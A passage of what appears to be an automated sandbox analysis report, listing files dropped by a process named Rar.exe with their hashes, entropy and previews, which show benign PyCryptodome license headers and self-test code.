                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2043
                                                                                                                                                                                                                                  Entropy (8bit):5.237240672014205
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:NkwEIB0jcQHMsvI/S3oCFl40lSifxGEgO9JJraZa:CwfFQHvojCv9JJrB
                                                                                                                                                                                                                                  MD5:EC15E489C4F3AF1D1987C5EA4FA2F3BC
                                                                                                                                                                                                                                  SHA1:02FC0FA5EC2BD850A5149C4ED28598A667D41E32
                                                                                                                                                                                                                                  SHA-256:83AE64E7E2A6D6A1E0CC643404157AD938D8A84EA9A7442F4210E10E9D5FD69E
                                                                                                                                                                                                                                  SHA-512:8989312A6F7A87A4D78D325C5836A9541A980477797E3C0133DCB1A2E66D2646FAADDBEAA7232BE44208A01031EB9EEF4DBA5F3A1E64D637C5D5A15957158EBC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Util/__init__.py: Self-test for utility modules..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2339
                                                                                                                                                                                                                                  Entropy (8bit):5.202413718317069
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:NxF/TEIB0jcQHMsvI/S3oCFcr+QuD0XTFBWTMhaja:5bfFQHvopH60XJBW4hZ
                                                                                                                                                                                                                                  MD5:F8501D1710CC47279356124DDD4A9A49
                                                                                                                                                                                                                                  SHA1:197A10A96EE658F58A107AF631A114904E4A6EC6
                                                                                                                                                                                                                                  SHA-256:F4DFE661669A43868A44FBDC01A60DFDDED11FC5A770E8B2554152DEC251F2D3
                                                                                                                                                                                                                                  SHA-512:EE8ACC076B992FB3C4409B5F04E06FBC6AD284886837BDEDD802CABC6228AF450333F9ABE374BFEDD24DE9CDBFD04CA7C06A93B03DB5CC54AD2CF5DCB4371D5B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Util/test_Counter: Self-test for the Crypto.Util.Counter module..#..# Written in 2009 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..#
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5968
                                                                                                                                                                                                                                  Entropy (8bit):5.267773090086199
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:RnQWOqrYJALrYJHdG43tDs3EsIG13NcuIHYtP+Q2+J+0V7x0x0xQ0y0w0i0+L0+2:aDqrYJALrYJHdt3EHGuI4pH2szilvr4
                                                                                                                                                                                                                                  MD5:045488719FC3B54CD805AFEA79086287
                                                                                                                                                                                                                                  SHA1:0079310849DE854819E7324DBEE7A9459F297BEE
                                                                                                                                                                                                                                  SHA-256:012373897A1401AA2BAFC1D4029E5C239355CBED106A163B57011AFDBC18C084
                                                                                                                                                                                                                                  SHA-512:7BCF2EAE6E754C947FB3A4418491DF4AD8C99771A3D2DB0F8FA1DD1736C4118059C5CCB3C0F1B26B301155EF1DAB4F606CC56C56263F1A1AA7C078061715AA5C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# SelfTest/Util/test_Padding.py: Self-test for padding functions..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIME
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):32107
                                                                                                                                                                                                                                  Entropy (8bit):4.8144423694550875
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Prskrs9VqIXAYJ+oGchbBZ2XmO2CQBL7plKRA0:Pr6qIXAQ+Q1BZ2XmO2CQBL7pl30
                                                                                                                                                                                                                                  MD5:29B2837A29B459F7AC7356C3E4AFEE8C
                                                                                                                                                                                                                                  SHA1:217FF3DBCBA7ACFCD46C51E29F7198C751767E49
                                                                                                                                                                                                                                  SHA-256:33EE3596C53755388DD219D425DE8F1D65F3CF64346ADFA51A2DE46846A5950B
                                                                                                                                                                                                                                  SHA-512:577671B265BCFB82A760F83DA006EE1FC6FDAD5ED34A8CB4FEF8D48E058697840E182121E93CEB9FD81A614A2E68B9011DF204B202FFE63F9125199A22B78423
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# SelfTest/Util/test_asn.py: Self-test for the Crypto.Util.asn1 module..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DIS
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with very long lines (303), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8710
                                                                                                                                                                                                                                  Entropy (8bit):5.184554837708348
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:jwfFQHvoBNH2Pbvf6KWvf0RoWRfrrFSRfnb3bjVj/3pjq7PfcN1Ep3S0rZ:jwdQHvd7WvfhQrrFknb3Rpta/rZ
                                                                                                                                                                                                                                  MD5:8CFC6216203E8227001F370383E6DF55
                                                                                                                                                                                                                                  SHA1:6B104AAA274506FED8794ED9C2414D4FA94AA6C6
                                                                                                                                                                                                                                  SHA-256:948547B6DB811911AA4E75E5E336CED60A3BE1036D4FD6C5AC68FF86662981AF
                                                                                                                                                                                                                                  SHA-512:CB6A289B14960AA4CDED95E21AEF8B2C2997DD90F56D9CDC033D27AEA2818F6963880553BE13DE8B647163EFFB315AA4EC87F572BD311AA62CF72102BFCC5A63
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Util/test_number.py: Self-test for parts of the Crypto.Util.number module..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT O
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1151
                                                                                                                                                                                                                                  Entropy (8bit):5.090285924912527
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:+1+715k8BZTiOYBHHkhzgtJpQyRXPLy1jgpajoP:+1+717Z+OkKc7QyRXTYOajy
                                                                                                                                                                                                                                  MD5:A0C63441A48C45F3417E90BD604DEBEE
                                                                                                                                                                                                                                  SHA1:7D80DD96977104ECE9AD12DAE596C289AB46947C
                                                                                                                                                                                                                                  SHA-256:4BAD1C6F40BB00F3551BCC1F1849E895178B15133E6DFCC0F10657FF1C5367A9
                                                                                                                                                                                                                                  SHA-512:80428786485D50A4915B3BE184B7BBB674B0BC277F1966591C0BD3D6366155F02F31ABD6972A7AC9ACFACCE9039801851340080872B51597F8E71553212727DB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest....import binascii..from Crypto.Util.RFC1751 import key_to_english, english_to_key......class RFC1751_Tests(unittest.TestCase):.... def test1(self):.. data = [.. ('EB33F77EE73D4053', 'TIDE ITCH SLOW REIN RULE MOT'),.. ('CCAC2AED591056BE4F90FD441C534766', 'RASH BUSH MILK LOOK BAD BRIM AVID GAFF BAIT ROT POD LOVE'),.. ('EFF81F9BFBC65350920CDD7416DE8009', 'TROD MUTE TAIL WARM CHAR KONG HAAG CITY BORE O TEAL AWL').. ].... for key_hex, words in data:.. key_bin = binascii.a2b_hex(key_hex).... w2 = key_to_english(key_bin).. self.assertEqual(w2, words).... k2 = english_to_key(words).. self.assertEqual(k2, key_bin).... def test_error_key_to_english(self):.... self.assertRaises(ValueError, key_to_english, b'0' * 7)......def get_tests(config={}):.. from Crypto.SelfTest.st_common import list_test_cases.. tests = list_test_cases(RFC1751_
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10495
                                                                                                                                                                                                                                  Entropy (8bit):5.073385582254096
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:0Vqrskrs9t3q/ILyOZMz75bdPmbMSGSrZ7llGLrOp:08rskrs9VqHOZMxjSrZJ
                                                                                                                                                                                                                                  MD5:FB3C8204F2C018E2825D45B12991A186
                                                                                                                                                                                                                                  SHA1:0BB3FEDFDC56F251526FF5DE20B2058BD1FDB3B1
                                                                                                                                                                                                                                  SHA-256:94A8D7005DAFC4F46C6DD73D758471E2E13CCAA4666D135C3F64DB04EC1E51D0
                                                                                                                                                                                                                                  SHA-512:5DF2907343C969CFB0D5BC28C4A5A5243BCB80F70E4DD482DFCF91AB10436235934329E49122B6A0788855F55683AE9F543750BA1D5E22D683A901BBAD31FD33
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# SelfTest/Util/test_strxor.py: Self-test for XORing..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVE
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3311
                                                                                                                                                                                                                                  Entropy (8bit):5.046154186405365
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:newfFQHvov0c11HR8GqgxpSKgdkyKv2JeIPHkOS:newdQHv+V00+dkyKv24IcOS
                                                                                                                                                                                                                                  MD5:6006235799D8B51FA0D57D451012FBF9
                                                                                                                                                                                                                                  SHA1:5FF6022873D06D926211402F22235339F228ED24
                                                                                                                                                                                                                                  SHA-256:A5195DE8F0FD1855C9FE4170915BC36C9C9F85DF5B8E14FEAF817C570F9C25F1
                                                                                                                                                                                                                                  SHA-512:66EB48B147A76F1531746E13E699610C26CB8094833005223ACF0B7A74E548388AE94349A642EF2A40132076A1D8C8A74EE85997AD3BE8290B758A76A9E3FE06
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/__init__.py: Self-test for PyCrypto..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWAR
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1612
                                                                                                                                                                                                                                  Entropy (8bit):5.252093420200057
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:SKKXDrFR/F2IPBiCXCpjf29QHupsUre38Ok41+dpo3oq/FGROi5hC3b7f5VNLjg/:SeIB0jcQHMsvI/S3oCFGROi+7nfc
                                                                                                                                                                                                                                  MD5:80548AD81CAB82847277B36A7FB78711
                                                                                                                                                                                                                                  SHA1:DF518CE7B812750B118835598A3E6278934D7F42
                                                                                                                                                                                                                                  SHA-256:165A0BA1E31BEC7C6E80633F113D3882CC2AC98E37F51E9224AAAE8B3DF93D67
                                                                                                                                                                                                                                  SHA-512:0357B12B490096A0564944310129D5EEBFAADDF5CDB3EB8465D36422AAB4AB606937FD1BB927C49904D7A43E12B9139D486D438D36B59FE06BF1145744AAA09A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#! /usr/bin/env python..#..# __main__.py : Stand-along loader for PyCryptodome test suite..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8290
                                                                                                                                                                                                                                  Entropy (8bit):4.711704617154598
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:fqrskrs9t3q/IPgznMH/wpZJ3wGp6gM9KlnR10n3kp:yrskrs9VqwgD3pZJ3np6gMaj0nc
                                                                                                                                                                                                                                  MD5:1CEA7121AA769ADD798184C715B0A87B
                                                                                                                                                                                                                                  SHA1:38A493251DCCFD8FA4324DA3BC7512D2EF0A6CB4
                                                                                                                                                                                                                                  SHA-256:1D9542404A9119043588ADDF20B0A69AF6023CFD5072610207A93509A4E7E0EB
                                                                                                                                                                                                                                  SHA-512:29086E883A414DDA4642EA3EE6119CEA6F1EACAD114AFCEDCACB65071DEFF5034CD5AD22EB88E26F9A17045C20BCBEE26AA59883D6C33D916CCA129895B4BAD7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2016, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2000
                                                                                                                                                                                                                                  Entropy (8bit):5.225498157362526
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:NrwEIB0jcQHMsvI/S3oCFgJ1+Ql+G8Aqbn0Quqoc9Df1UQ:JwfFQHvoj1HlOn0dqRDf1UQ
                                                                                                                                                                                                                                  MD5:B1A5A642E0F13E51AEE1AA096B819498
                                                                                                                                                                                                                                  SHA1:499EAA63461629F2883FBD1B40FFA32025CB64B4
                                                                                                                                                                                                                                  SHA-256:AA5EB6DDEE38BF49097C0AF6262C8B90CA0CD366AC0826DD8AAE37B63CD8B045
                                                                                                                                                                                                                                  SHA-512:452A98DABBD55A1EB3648CF02BA49430887609467920511907788505F9D5505C7F11EEBFF850D26722EC3F9E92B7BD14D37EA15505D09C68AD10825770D969C4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/st_common.py: Common functions for SelfTest modules..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15703
                                                                                                                                                                                                                                  Entropy (8bit):4.885505436795799
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:frskrs9VqeLElh6OXUqNF/eqHb2G6kP09W7:fr6qLjFvTh
                                                                                                                                                                                                                                  MD5:D6E0624C129C7C3BC3CFF8A17611430E
                                                                                                                                                                                                                                  SHA1:30D96A4902E6D5F54667EE9E94C2BD4D3F2DD022
                                                                                                                                                                                                                                  SHA-256:EBED89F64095A8B493E850D5F976AD3E30991211C5EE53F47242B18DBC762490
                                                                                                                                                                                                                                  SHA-512:4BC303F11DB4301738C8A9E0E983C5C13AAC63F3B6E9CC597E1C2999B8EEE241E9CEE5C2B9DAA5D7DDAA6EFB468E58E7DA52110962B49A5C9D55DA53F6382B01
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# Signature/DSS.py : DSS.py..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1121
                                                                                                                                                                                                                                  Entropy (8bit):4.992804063334473
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1RE2C19+14f+161z4NoQoAUx9Bw+LtvUO38AdILhG8A+N8APto5BfTE5PadOI:hy+1w+1KcJoNRL9UfEIL/LWStrYdB
                                                                                                                                                                                                                                  MD5:38E9FC3517817B876019A478AB882734
                                                                                                                                                                                                                                  SHA1:34493501A5A5AE3C744CBAC46BAEA8C2F276B08B
                                                                                                                                                                                                                                  SHA-256:BB3A920B06532D4AA7363F205556243F2B71014E1FA0851DE64840CD26C9AD50
                                                                                                                                                                                                                                  SHA-512:6E003672E1F2B603325A57C66F59C0C1487243D5FC738A809FF04960C5A675AE3E68DCF0BB101CC00944DFB80FFBAF1869DA02CB8D46AD92841E9A9330689F6F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Union, Optional, Callable..from typing_extensions import Protocol....from Crypto.PublicKey.DSA import DsaKey..from Crypto.PublicKey.ECC import EccKey....class Hash(Protocol):.. def digest(self) -> bytes: .......__all__ = ['new']....class DssSigScheme:.. def __init__(self, key: Union[DsaKey, EccKey], encoding: str, order: int) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: .......class DeterministicDsaSigScheme(DssSigScheme):.. def __init__(self, key, encoding, order, private_key) -> None: .......class FipsDsaSigScheme(DssSigScheme):.. def __init__(self, key: DsaKey, encoding: str, order: int, randfunc: Callable) -> None: .......class FipsEcDsaSigScheme(DssSigScheme):.. def __init__(self, key: EccKey, encoding: str, order: int, randfunc: Callable) -> None: .......def new(key: Union[DsaKey, EccKey], mode: str, encoding: Optional[str]='bin
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2154
                                                                                                                                                                                                                                  Entropy (8bit):5.295272514709387
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:MwWOqrYJALrYJHdG43tDs3EsIG13NcuIHs0+mETupY34KepRG1:MwDqrYJALrYJHdt3EHGuI9DjYA3G1
                                                                                                                                                                                                                                  MD5:C9AD0C720C157C21F0BDE59A9C570978
                                                                                                                                                                                                                                  SHA1:08AD968BE36D338E46DBB26BF8F74508451FA359
                                                                                                                                                                                                                                  SHA-256:B54B24BE5330B4EB23A8D0BEF242BD785DFB0F1B31DCBACEB87AF47B73DB5A32
                                                                                                                                                                                                                                  SHA-512:79292C6608760748C9030C0C7DEEA4F600A7480AEE20290F5F9E9C55A0162F9C3A014CCD4090694DBAD8322C7FB000813D97DDC9DD7F7E88EBEBBDEDA189AF14
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):895
